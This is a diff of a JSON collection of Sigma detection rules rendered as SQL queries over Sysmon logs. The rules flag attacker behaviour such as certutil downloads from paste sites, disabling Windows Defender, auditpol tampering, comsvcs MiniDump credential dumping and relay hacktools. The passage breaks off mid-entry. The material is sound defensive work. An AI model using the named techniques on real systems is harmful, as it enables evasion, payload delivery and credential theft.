"Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_netsh_port_forwarding.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1140" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Legitimate use of Nim on a developer systems" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", - "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", @@ -17837,15161 +17401,15313 @@ "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, - { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator working with shadow copies, access for backup purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion" - ], - "falsepositives": [ - "Installation of unsigned packages for testing purposes" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" - }, - { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Files And Subdirectories Listing Using Dir", - "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "status": "experimental", - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "author": "frack113", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_dir_execution.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback 